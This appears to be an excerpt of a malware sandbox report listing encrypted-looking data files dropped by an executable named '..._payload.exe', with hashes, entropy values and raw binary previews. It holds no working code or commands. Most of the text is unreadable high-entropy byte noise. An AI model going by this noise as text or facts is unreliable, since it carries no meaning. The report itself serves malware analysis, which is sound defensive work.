                                                                                                Preview:.<?. ...AO.?Hg.....[.qq.....%.5;..Jc.<............>4.k.w..W.A$.~^...`..o........_..w....J..O&......|......&qe.......{...W.G.UO...TR$..U.P..l../5.z..{QR...r..t..?S..(.......`.*......z...l.H@....r.>K.)..5d..i.+..i.=..d..2....i._.R...,..D...+4....z...j..;.B..\......k..c.#..DxS..0...*.}X....e.....k.^.C.4.i..r^.V.=..=/^....[..,..D?C$Q..P......z. ....(:..xK...<z....8.j..Y5.pi...l.....WwHl.1c..$5=......&l>..0l....y.[Gg].I.2........_/..%.-5I~6O.......V.....Le.m...L[.m..@.......q...%...V....4*?.g81."...P./...&@(]...=.2..J).#..L..M].A....D.nL...!.....J....O..!./O.......l.[P'...*}s.(.c.....%..|...8S.....0...Lv.....eN.....SR..Y.3..WBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):808
                                                                                                Entropy (8bit):7.715543623955872
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:N85pJFOVx7P9Q6Bx0K3aTxdL4cVWkno6lPGTpwp3I8gRdIlw1CP/bgJc3cii9a:ELODV1DaVHo6+6IxIw8Pzx3bD
                                                                                                MD5:320C33275558CC0B98309555E25A289C
                                                                                                SHA1:FAA8D7F058D7755F724C8350CD9FB34BD5F919F8
                                                                                                SHA-256:9FC8E151358316AA4C90E8354DF7332F36899706D566785E66452D65391D544C
                                                                                                SHA-512:0A20C730B365F44D6861EE4E65E632CB4DB7DEDF87EB37184E4949A4F4AA84EF63B5C059744432C99AF6AC53E11ABD0DC021DFE997D10C678140E5A89E5CFF37
                                                                                                Malicious:false
                                                                                                Preview:.<?.......>gj%......S.h.x.*{.R....C..]....H-qU....8..O.G."s..q.0.n..8..Y..).Ne|....Y..b.rQ...2.O........[OO......V.(y.1.9..}....JO.=ng...aA0..X.@..)......[...K...c..I}.ld...X..u...h>0...L%...-.#...y...r....0.c..>..y.e...Hzj.....?*....$Wv.w..&?............'`...V...Yy........},q....|....a..U.U..+....?...#g3......o....(.?#%q.U.h... [W,....W.)....|....^..u.f.R...Q[..}....-#..).>..;....).W..7.C..^;..9'......;...(.p.m...8..JE..i...9C.K..4fJ`....j..1..!Z.N2Jw}..M..h4.. ...H.H.~.`^#...s...=ni]..4...y..%}.z.i..s..8@..&I@..s:...n...No.X.O......;...Q...:.~......I.V....|h:....x..x.&..N.X...X......C...O..r58.V.>... ....zh.m..........i...%....V...3.yZo6..xwy..bW.y>..m......|=...W.3<...C..L....."..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):749
                                                                                                Entropy (8bit):7.719630817254144
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:6AOyTc2KBRq8WMDUaW53Wx2RcJ0hq+EwHC+6DAZvbLSQE1M3ntC2m0N294yQinFl:nTc24Dgaq3A2/hfasZv6QE1M3nBNWnFl
                                                                                                MD5:FC7B0DAC484BAF63201ECEC08ACAF1EC
                                                                                                SHA1:9164EFF76D8071368B095F78F7CBE5F6C2750B03
                                                                                                SHA-256:D2533AD74DBB6A9914E715772EF0536BF1C77A0F29D94E1306A5C60E707C1572
                                                                                                SHA-512:E83F63A065B62CEF69C0711BC129067239F4D72FA30822F58F2DBB5404CF8FD9A5BA523B7C1D0A0634713C586007EB707E4ED96C7913176490023AF83B6302F0
                                                                                                Malicious:false
                                                                                                Preview:.<?.V..Y1a.....9...o..X3.../....?(S..Mn:..;.;k....T...;.bf6..H....c..X<..s.Dr9+O.YB..:.~T.38..c//j..mm......A..Q.H....-..!...g.1.F.p4{.....`....qqIj.;....D......+4..C..v.E<N.....p...L&......Q...........>P.C.....`>n...,-(Is.#...}....X.~!.uL.R...Q%..%.Z.@,...Yn...7C........@..}.!.tfx.Y.j...qB3.]u:.........A.vo.....dP....._....i.....;.{^h0...89.k.d.......Y......~t..W...MQ..NQ*....h..I.d.&....._Jn.".2p 0....x.. ... ...Pwb.r..].T..Q.@]j^8.x.*..1.6..bg\..#Q2R.sjP.....2.....x....Ut...".......f5........'+......}B..."~..=.P.%.?....W.j.M.M_.........,..F.@.w...1...D.......d.<.=.c...&R. ........=fU.`...>Q.[~....M.T....I..3Lg.n.>JAV.S^.-.... ..hBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):805
                                                                                                Entropy (8bit):7.687255054804733
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Z1BHjP7miJZRCisoTpYSPID1MYa8a+UqU4x3bD:PBHjP7mqyisoVYSABTa8atULD
                                                                                                MD5:66A90BAAC954C82324A13A2E8AE108BC
                                                                                                SHA1:272E1A6E59443585A67647AACDD82D6DABDBCC24
                                                                                                SHA-256:6C31FAD573FB9618A5E24A83188B77A94EC5CEDC7048603789FE6770969557E5
                                                                                                SHA-512:BCF120D7AF53CA0A9EE9F10244E40AF91A9324ED8279F60EB039B17F71F03FF5AE03473C1C6C80D404ABE6C5AEBDB31E19B720039B5F4523BD20435C14B5C8B8
                                                                                                Malicious:false
                                                                                                Preview:.<?......3.5.^%C.9S..z..@._7.AF..[.R^UcE.)...H..nx..x..y....vI.Bd.Ls....j..B...tEz..t...{.a....f.XX.*w..tP........xF+.F..W%.K.Q....b{H.O.'.T.>.......4.....c^]u..F.O1..K......3..U.8.....<.j!......2....+..)....I.Kv..].P.H2...o.......c.,y.#.B7Cq...0.... .F.r.....qs?%.......t..B'.a-Bb...].}D.,KH..q.x`.33.......P0gG..H{.'2..?..O..._....C..<j...@.0.^`..F14B.M..5.(cJ.}"W...).."...-.M.............PF."...y.....O......Z...<Y_.......#I.....j.(R....n..B=..Q..;..>..........;...X.h..nl..-..F...-?.(D.S...+.,K..z6.>..*..G..a_rJV.{.k.o.o1.O~......M]...b....]%vN.8Q_..%e#."......(.W...c).....&.}."..o..=U!l|......Ui.|...!<.5.Q"...6~.[......5l.q..u4...I...s.c.9?.+.I....mU.bi..d@E.%[..K..-..ZH..9.:-.J...(.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):966
                                                                                                Entropy (8bit):7.776147948944194
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:HKL5A7urveQFdKvgsyXI0rm3c55BfRx3bD:HO+yZkdyXI0rm3M55LD
                                                                                                MD5:8C6BCFB2ABDFEF0B44E655C4532108F3
                                                                                                SHA1:783BB500F035830661EE645092AC781CCC64ECC4
                                                                                                SHA-256:E5962E0450EBACCAECCEF4A2E3DBF50E4FAF9631441CD4B82846DF0014AFDE88
                                                                                                SHA-512:622C575432D132B9E00D1A1BB526745865815067572200DF019B7441204CC1CECEF1B77B45810768F5F0CF65B7D07E81449CFC8A0DF422D904C6CA0BACDB72D1
                                                                                                Malicious:false
                                                                                                Preview:.<?$....R*..DR...=Y|....i...g.......DM..^...|B.q../....%...~..].^....H.W).....p.. .....#.....G.../....:}uJk..M.J.....xy)u..Q...X..fF1......lp....p...u...Z.....^{Qa@1A.O...%..=/2M@.4b./.Q6j..!t.&sL...>..r .Q..1.v.,.w0.w+T.L@......'.-./....9....jl.......[rGH...v..+.#J..S...-.....e..M..c..8....7J/..Tm..n..B..<.2..GO9....,....Z#....g......E..........9...).1...%....}Z..N...F.&..%....b.........m"....6!,..0.../q..C.)...w......b...M.>.c...5..U.2....Y[D..s......T.r.hs..D.T[...U/..~.......W......qT..mp..(\Fm..'w.7.<......;..*..Mm{.r... P....Co.2.P:.k....u..#FBa../a.........:...{QG..wx..1.#..6:ew.,.F..3l6 ...=..VA........j=......({.9Qe^.m.L.....).H....r&.]...(..f...L.._..gF.@.t'tv......v...n<N.*....fBi...(..(...k..{.N.........S.m..A.=...BH.<....]g.vy..y.,R.....Z....|..ha.......f....e.ubc(=....|*k.k. .A....Q..x.$6C...]......s..EV..0.k.%..tBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1731
                                                                                                Entropy (8bit):7.876642360600314
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:IK/gudzIGVrx+49DRlHGZL3SDazj9C2quMLD:cudNXjHGZL0qjEPt
                                                                                                MD5:A6D4D263713E41F2340FFD33A06B45E5
                                                                                                SHA1:1070E5332D67DC4B6091312024B01B15F02D6A0C
                                                                                                SHA-256:1BDE17B54EB8F64C6C6AACD8F3EE1AD4D3EDB2F3A93257B671E54031B993E8FA
                                                                                                SHA-512:F38963DAB77E77258B64E5F26CE64E65D13DCE6AD93BE1C4B1C414ED639CD1E8577EB5668CD34B9EE151AB64FADC0CA727BEE82145FC5B0FB4C99FA2C2E6EC40
                                                                                                Malicious:false
                                                                                                Preview:.<?.Hb.T.=[.J.f..e..H.......qf...=.6..).B.TT..`t:(..Y?.z.ah.t.b.mv..$..O8..P..).O.........e.&B.-...{....y.....b...%A...{...g..S....h.!.m.)...v...<.9.Y~....y........G..~....$.s.....U.C7....y....d....9...).z.l.....:.q)e[..U.#%H.b....q.f...e.g......9.k..p..B.T.a..n.WB..>!.B#.A.2..0.|.b<.P...^q.8|...d.....:.;;..j....AM ...5....{.._......{......e<..#..b..._P.c.)..;.........P..b_.\.......:.a.?la9.....nUk.`.@.4{...PJ!..`..c..u.....p....O.J...zQ.l..).@`..f..*z..M..3..RR....()....G..L......$..?,.6'...Q.70..V1)...D..W&4B..p..n\.UC.h)..<w0G.]D...s2v.o&.x..,f8...L*K.{..2..#>....F/.G-*O....% ..'A&.q....*+.D.Q.............l..&4X...M.._...<...,..,+c.J8a..g.M_....|...Q=C2..R.c&NX..5U.V6e]....J.Q.\E.?.....X.1.R..>:1..a.p".....%`a.G7.y..<....;...x.Bq.i.....i$...4.6.S.*.....J&].V.c`;.2.../;...K.|p.......,'.f...MYd85.>.GX..Y....j;..#E...F,.J.'....~..w.+._J...f.$.h.4..Q.G:..j.lFGy.t--.V.^.F.PYa.G..s./.oL\..M...3....J \./...Vj.P.w..|..@*.u.x.f..L(.,.J.r.*......i....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1716
                                                                                                Entropy (8bit):7.902969815976608
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:1a5mdwsZdXUZZaQKItrK9KSWnjaKUKye3yf1JLD:E5mdpdXwjbh3w
                                                                                                MD5:7B736D3EA42C9DC564CF1B7EA5556C11
                                                                                                SHA1:40CAD8F7627541FCC45DFA91EF27F5F2F7BBBCC9
                                                                                                SHA-256:0F0D322DB9BD16424E1DEE9A2B88F7900F0A8CD5B5E8FC51025DBF6995B8B56B
                                                                                                SHA-512:88AB3542EAAB37E2ABEE9ADF5F48C43B87A6CC7D04420A86CE471450BD4B1039CC97ABC4A9338AB218927CC2F3D05EFBC5C92256FB8088149660A3E9DF8BACAC
                                                                                                Malicious:false
                                                                                                Preview:.<?..JD.....yZ...-...../..". .\n...C.f...'..Pj.+.M6).n.m..I.....C..9$...NF+.........'w...x.....(.!%........A6N....k...H.....b.....*`..Dr.{ 'nD~.`....'...e.p@...v..)....b.O...0..&[,..*p.Y......a|.8N.3.x.Q."P.T.....z.B...1..E.2!...O..Hd.=\t/....JW.........`..,...[....<k..)....{...&.S..........2..(]..#* .z.[..e...o..:j.....>q...$...L...=X...i.~...uI...@...V.<KUSI...5............h.T.t|..9".!/.D..>.F#w..L..j.....k.......|<.-..'3..v.8...J.O&.1i."..........GR....\.o..,qX.5c6t...Y.U...c..I...+...............5.n..G...[.r.._J..a.S..G...\...#...:0.y..K...b.\..9...`.h.}..P..B2t7.......oY.F..X..QM......"m.m.....1....#.\<(.,.....g.9.gx..i..h_.w..u..r._.F.5.)...h..Bsm.]..h.......Z.Qi.J.Fe.&.......q<.'.._'...=F.e..&...:..e.M's.<.o...^.\T.!.2..H...I.7..w......KfGv.[Y.[..-.X`+3.3.R..K'.c...4.3f..i.`.f0T>a:...+sb..]..|x..Q..Fj.}.....4........O...T...>d....!9.pP..xH..LQ.3..X.-....N?r.k.lt/......n..j.|z<.....o]E.v.X..(l_..X;..Dj.......#.j.M..m._E.-.A....i.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1753
                                                                                                Entropy (8bit):7.889926402598312
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:MFRUF7a4oFtkbs3Bl8FPtJypvj2QiLUISUDqBdRrpELD:GRUFAFtz2xtJypvj2GxtFpA
                                                                                                MD5:E8A34222ECF4DC55700925A2CD898246
                                                                                                SHA1:9B4CB4F36597E0FC61630E226BE64D9250C41D0F
                                                                                                SHA-256:ECC3490D600612416701F4B9856F2CF50467643EC2C51043D7FB6FF2233E001C
                                                                                                SHA-512:D190822B635BF581CA0BA49823EB3D3AD98A24BB91815D9E414472B37D9FA8817EF6396B1BB7EF4DD1C9166D0C4120C10E13AE134A904887A559AB826A9997B6
                                                                                                Malicious:false
                                                                                                Preview:.<?.tj..2.I7...9F..g8....Nfa....r2^fjs.C?.})T.I..2..&u.....i..T.....?z.&d1...%..i4l....F.`...@j.7L.{Cx*...f8..X%..e...F..H....aS.+.f..".%....A>............d.../.RK.&.....&.CbIk..Z..|..mnn..I..[Q.F.....i....|"iYtk\..B..|.4.Xc.?.o..o.q.....Ky.......R...:McM..>..eM.^.<.."(.Q'.*.....zi..3...%.?...b'b.,.h.4.\.....zwE.....3.9..S..8%B7.U......~_e.qe..?u.Qq*..Z. ...K.....=..n..7Q\U...M..B.....AfW..9...9.<../.=.>..,V..B...d..\...[.."[..z........"...O..o;.u<..8...E./...NP^Q.F.)xv.U.....t.zd.z...$...".F.ws.n.....TN.Y......8a8.0.H..!.YU..4..ub.,....S.d.@.y..Y.b.Z;.....G.+..E.te..>[9..O'..0....m.d.J.D.bQ..6Q...{.i....]..........|C..o.S{ic.;.u...K~.A.P...._O.R8..|.Dw.a:y%....[..._[v^c..".M.2<...%..P.b.....AT...G[......p..3.....|'.:.=m..2....d|.B_...CR.....@K&O`..m...)yP>..c..(..X.4!.rQ}..KJ_.y.S...S;v.....{.O.C?.....0.X.%.E../..G.....d...C....:........\....T{8....u>..yf.UX.(....OVjh..j.4....CJya.....+k.y..> .FJ@ .K.{....-.Mga.+I.?6<=i.L.k....4~v..(O
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1700
                                                                                                Entropy (8bit):7.860228553327057
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:6Gw9WCOo4N7WojnoHyDBe0lTBeq2VraJ8HMeLD:6GwXOoo7LuS8YTBgr08Ht
                                                                                                MD5:F770036826243E989FE13B155A373137
                                                                                                SHA1:26CAD9716F4B59A7E3B3D8A18413A2ADEE4E9BBC
                                                                                                SHA-256:C77F41D748EAAE0D96F1282C57B1A2516C04D338EC9FB5F3589C545644F296E2
                                                                                                SHA-512:0297917C3C91F2F34588BA1F4BD286CAC600D0A0C85051D702AF498FF826AB89C8A1A1198BB13B0F2BB168FA9DF43A3E7E4881FC6A1B01F52B75ECD44D4EBE24
                                                                                                Malicious:false
                                                                                                Preview:.<?.;...F..uo...}..F?<.P..G{i0.......9..j..._..-{= g..a..DX...r.#..V.f.D...b...M...t..<s..BM.A..}lQ..L.....#0................y4...K.p...}.C3..p...(.'.iw..0...Gi...7J..x.8.....K...V,..;n..G.R.p.G@....#v9..W.1.......,4_.+.Q;......".....E.....-...Kr...O.Yq.Km..-8.Lf......us.p..Z,..f...q...^`R...Ai.5n.<(7_.JZ...$._.<.........b..N.u.0.d.m....l.WW{.G.....NZ~...x..3...-u.T?..?.... J.v....\@so.....I.A.]..sCx:.A..5k.},8.~c.G.76Z.h......?"Y.l.1O...."..ze*.ubZ.]$.r.j..6n...1...N....p.=.PY...O&.[.....8.-..(.c.Z.k.7...w.T`^..%........]|.q._.=.FZ..P.2K8^..l..Qo...;.8......U.B...;NO/.c..:3*..X........./.GC...}...'K.X...D..a.=.P.F)..-...QrNj..O....D...vF/h4^k3..D..>ZmZ..p.G.......[.4..[...P..r..4v..P....:.1`[..o.Y.J.0O.....I...f......{...q..I.R.F?.:..qdf.-....F....;...r8.C...........}*|.V!.S=...j...sY)...z>.7..a.^.7fL......X..{b.9X.C.._1%.,\4rY.9.i...udV! ...q..}.'.D."K.g....}!..+.N.|......c.((.....n..1.p...q.;.|.%.0.s...h...e.......[{.........W
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1737
                                                                                                Entropy (8bit):7.886868691522766
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:yQvMRsxKOratHyzbEY5yQWEdLwwwPt1XVrLD:yQVxZahGy/E2nXVz
                                                                                                MD5:C2D0AAF1F58E35B6D14B0F1951FAD99F
                                                                                                SHA1:C66F6C9965D5E3F03F3048931A448390C0636D17
                                                                                                SHA-256:14C8F9B465EE29D394805CE75C0B3747263A9D7056786A5694374669DD016216
                                                                                                SHA-512:D005E317D071B96254B6FF02A509AAD9C9E1F7A9A67ED81D520B2C4EA45A950556F2FDD8FD6503764CB03B0A9C5AB68DFD1D4B1C523CCC3099C44B1DE9F9F006
                                                                                                Malicious:false
                                                                                                Preview:.<?,.`...5U.ak....].....B.a.zS9..Op.m......u?R.L7.&.........%...PT.0.k..a72Kw.o3...`..=...m+.$$G....6>.MI....."E.c..d.l..@..n[4xS:..[W.1....'.B.......g..S.5b..sc.v...s..f....B=......Q..4e.4.%fg.....9....E-..:.7.5..fF.........8...b.En\6.g>.$&..x`.".,Y.2"...@}.&.QK..d.!^k5X...q.r.\2_.sL.$..u./...........V...cum.b...Q..H5..P.s .lH..[.KHT;.s..s ....b .-KW...V..T.%.7.....#....J/.L...S..A....;..%a.2....@a.T...UC...?(/.J...]X..d.........(....:m.D.;.x.(..E...9.0.-|:.s.{0..Io..Q..^j3../.......4 ..7....J./..=..qQ..nm.E@...{.....fV...N...u.3.*.........h..9#..p.'m.=.:.. 8x........u..x2,l..........M.s.a..W2Z....5.u..M.@x...M*,..y..i....N.:*.u.*...j....A...C.#......y.B.s(&.u.&.lG3*...;...;;I..{.....K@....q...R..wD..L.1Z..?0'5.....HLH...X.m...cN....d..J##..E....K....H.3.....E..^<...T:........K.u...g(..Up..>.h3..A......gCd..........HL$.....]z..8.]<.l......s......,...VR".#.V..&.,wmk.H.VZ...zn.:...J..._.\..s.....a.N....5.p...vo.r........%?JD.Y^.u....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1722
                                                                                                Entropy (8bit):7.883904236862035
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:jO4NdR6KjN+qojrVYyICuwkq/kSJzhSXDg0FR7yoLD:5NdRnjTo3VBICu9ahODgmyc
                                                                                                MD5:27AD958725A202CE17699AF1286680FD
                                                                                                SHA1:A29D3271824610C592DF432C2486294BCFD4D345
                                                                                                SHA-256:676E15D461644324CC792569E74483CEDC2E3A9AD07D350B8787070DD59707DD
                                                                                                SHA-512:D631912F0C76DBC9DF881AB56D94C07AF612BE739728E9A2C08D8E45853FA419EF7306831D79C7C8CC4B046E87D541A1152B540C00458DDCDA9C88742D1766D4
                                                                                                Malicious:false
                                                                                                Preview:.<?..b#W.....aQ....KU.c8+..}......F.+g.<...-|%...I......@)5p.p9..m*(.6<+...+......'K:.....7...S.s.I.'......B.8.-[Hx|y.E.7..!......I)..2..&C..|..N....'M..E.\G$.L..;|3.....1qt..Pf~...F8M.b...u.&;..Wo6XF?Z.N..v..MZ5....<.t....{t.J.v....h./.....bT....~:.\....E.5.x..k.4...#.".y..,L..b.i..GU..zSF.!...d\.d..:..Bp..y..8...V.;g<......u....Z.5g......c=viQ...)l..%.D0.....#.....H.q....UG..9......#.*eg..h...`.;.t.........,Y-Rz..z.w.9Zb;c.02Xr..py.l/I.,c..%.F.B2.....L...V......D+{#ep.mgp.c..b.7.....DcQ.u...[...6....Zq|D.s........WT_..../F...^W...`.....M$..y.u...j.y..x.SJ.......Q.I..VV.m".f...8.|H......v........|.R.w,N.R...pJ..,...tu.0......FN....`.$:...m6... ..p ..K.B.r\.....i.f...9..e/.qTJ....X~......U.w+.Ml@Q`......T.r.7....I}.....PN#.w.hh6.8...c1...k._..cl.Y...)..M[...H.X........O............Z_.b.[..}1+.$j.p.#....3...l.s._5.#!..o.c.L..Hbt.v.5...8.M..)R....D.I.....D_J......jW..... ...*.U...;+.>......9..j.......r.mr.g..jc.{.n`./T.*..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1759
                                                                                                Entropy (8bit):7.889649856528957
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:hE+etcdUbq4LQLZe93F4LWPA6B7nFmFbGLD:hneSdUbdLLvm3M
                                                                                                MD5:7F646ACD55952856E1B0E19C2BD360E4
                                                                                                SHA1:FAF4FF93FB8C6AA30CBC4C203AC74C06C538220A
                                                                                                SHA-256:6A28DCA5CBF308174F970D56A12E67B8391B9450A790A9B5C14E9AC596BD1E24
                                                                                                SHA-512:8C66641EE98B1E2A80EE7F3151835A96F836634138357F893CE21DE3A7CD970106C90FC0CD8A9A1C6205E1FCAAFC7C86E7E2F1B4A3CB2BA85B308F8BEC8A027C
                                                                                                Malicious:false
                                                                                                Preview:.<?}.r."..)....y).p...0?>*.h.R./^.y..*.n(R/........9...`.........<...<....VUn..gI.Eu...M.c[~...l...y...e.._y..F.uUa....^..T4_...9Y...Q.Q:.....w...<.w#..a _[..n.N..8.|\...........W.j^....._.K..u.|.x...P..C.....8..V..R.......!L.S....K..&......].cg.x..g].y...A.....D....+.0..p.s.E.^........8....~./.C.e........W.g..>....h.YSg.^..Y.)d.G..3.[.....f.0d.MO4'Oy...m.%"..l...&..M..+....5/<.)_....}....d...#.<..r..H......\.........r.-....1c..Z.P0j*....i\h...y?h....KL8m.j.K%"...2.#?.n..1y|A....m._.....Aw.o$.E..@....]...........X..n..9...&%)..s7..d........H.>.%V.:P....}..jh..V..U.\.~..lv.7'([=T...z~..me&.B[.<..0....=.E-..B..v...NB4E.9|'...x.(.......{.:.MK~N#....Y.'....{.9.,...,.l.a.C..|....+.tfc|ri.3{54..hq.T.l...".uU#/6..r....*V....K..A ...i. .T.....y.....w[........`.Z..`..h.cI_.%....e.~...W[.?\..l.|."?E2.1.&....k...r....:.G-J....Q..j..,....\up...i.eH.[..[...:..E.R.*B..^.1D.\...i.i...;A...?.d3.8.fr.HT..8...%3.KR..eC.y..Yge.....8.#X...ua.#.CaM...k.._.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1706
                                                                                                Entropy (8bit):7.883920968930225
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:zBElyjStR4ub3PqjbKvAUHtJg5fXoX0suAVLCdLD:zBEoWj44qMHJFksrCJ
                                                                                                MD5:FA753C109196170ACEEDB7EDFC8F15BC
                                                                                                SHA1:ED6AF352245468A8F042B875EA304C72BCCBAA9A
                                                                                                SHA-256:787E553E7251F0C6273C3AA849CCAB46A882C8A9F404E4CFEBB1AFF31A522DF3
                                                                                                SHA-512:D94C6C678936579755D53F8760B07C52B6500EE8376A67DD87624274FCA3BCA7356CBF6496BCE7B757A8CECFE9ECAB2B2B988CFF967A8D3C45C64AF88FC38348
                                                                                                Malicious:false
                                                                                                Preview:.<?.Q9E..f.v.....oiND..*...z.O...W.......fx|......]....U..oz.N....Z.l.F............9D.....hr&........\_../K.W..|....3p...=.t3...d..B.ybH..t...q.G.....z.y?(U.......P.'Q......H:l.]..H...8.V.l>...fq../.p.N.R8..@..Lu]...U]..:.S....fa...^.....#uI..c.6..I....{..m.{..*..2b\.F....]..X... 1.....]. ..:...pLhL..h2.g...vH..O.......p.........,..{;K...,..5`0....M...h.VIt..A.D).>.>...=&.......J..]A.o..O....-y..y..E.../s.._.c..c..f..R..vb......F...A^.Q.hi.Z.j...*'...-H.O'.$yu...]........^k=.bC.ue..~L......N,1....5.v...R.n.;.:..5x...}Z.!....R...d..b..E.`..>I..!!dxHJ1b...y.)...`H0.d..."...x...(....l.q...A.j.t.fn...'FN....fg...b..b.].k`...X..2..@....M....~....P..t..r<u<...*....=.L.G.\./5m.7].<.m...&....b.[..&.......['.9..X.;.+.?..(DO8....a...LG.=..V.U.....:.sGV .~5......5...'d..5...MEI$.......F............Z..."{?5...t.....m..V'..=.O...#.m..f7...Y"..R.J.0<....0..".].X...l.,]z....Z..F#....i....KX....2o.^g-[.`2......o........f.9#..C{.).+.r.h.....s^...X]..z.IN
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1743
                                                                                                Entropy (8bit):7.892192205668032
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:qAPqE7cuRBd+BY24sp7xpweiNhQ8dgbAEcWTLD:TqXuWl4eOhpCbAEP
                                                                                                MD5:05CFB8EA8DCF43C62A5C9F9C88DC5ECC
                                                                                                SHA1:9104AE76448B9E407BC69DF86AAF32DF9D1036E4
                                                                                                SHA-256:8E9AAEFBA16F569EB5FC7678C7FBEA447FA27EBFBCBA2476ADD9A7B8D43C25E9
                                                                                                SHA-512:7F9BA4361D25C34CC23D7F650A692E1BCDBAAD2363489A9793965558F7F50DD1302D4BE2FA5140A39539A077F6D1EBBA01DC5D09C23D2A7A7701AFB7F6F93DE4
                                                                                                Malicious:false
                                                                                                Preview:.<?.:..G.i... .(|-.f..F..X.qr..'.'.FY^u.\. ;|Z&.s.......v.<w!M$..!........`(.......K!.TYK^.?.....A..r."..\;..'..`.B.....s../?#*8p.dm...T../M.+).D.m.i..f.-TUUX6.e!....mM..[5.P.}Fu(4mF..l.i0.a"+6.Z.;..j+..n.0.<...8.n{..#..Rj.G.|.v.9th.I%..d......'....p.JG..^..`.....9...U.j*Z~=`.E...=..m..]Gj..k....(.R&.-...\.....Q.D.c...hOt.....P"|.a.9...6x.+........x.o.u..`...N.*W......d.`0]....$SZ..&..c.F.a5..Q..+@....=.#...Ih?.....OZ.1.....o5v.-.`..l.Z|.>...../:.!.Eh.E..,O....\....}..x6... ..c.<,~m.|&...>.......H.t..V..z....E'.D..E...jD....y......4 DM0..k.....#{.,...}P......E...I$x...gu..=.yK}...^;..n.2KxZq........`..a"Y60.3..qEc$".Mx=vt.,f..|....Oj...."..xk[...b..A.I..r....A..fz..h..<t.._.p~s...4.((9.4b....v>..j...........ow..8s.i..%.92.}K....z)%..<:...........O.YNWEy.....t71\.i..M..E.....G|.y.`Cs\.Q...\..s.87..>......tk...o....l.}|z..........>.........@..0.F...)...v.4..$.v.y..<.6..E.<.aPR=rtP..:.x.:!.h.fl...%9..iJ....E....Q...H.48o..l..k....).
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1696
                                                                                                Entropy (8bit):7.864186748989885
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:rxiL3/OEyLjuF8F3wDURaoUjLsML/Yiq4cLfLD:oL3/OncURatLrYi1cL
                                                                                                MD5:55D52AF9B2CBC6EF90A9387198A2C13B
                                                                                                SHA1:D006BEEFDB8A18B6E60E0C641E631C784430F84A
                                                                                                SHA-256:FFAD3659C64A9FFBBF533C07DEEECA48B58F8DFBABB1CA7D52D77D53F183FF26
                                                                                                SHA-512:13E21C8DFBA78516D415E100E1F3A78D94C0D90013EACDE2151AADA24754900ED96C49E10B20AC83B2592470FEF6EE6F1F99A27F4F428C9199321D520984F29D
                                                                                                Malicious:false
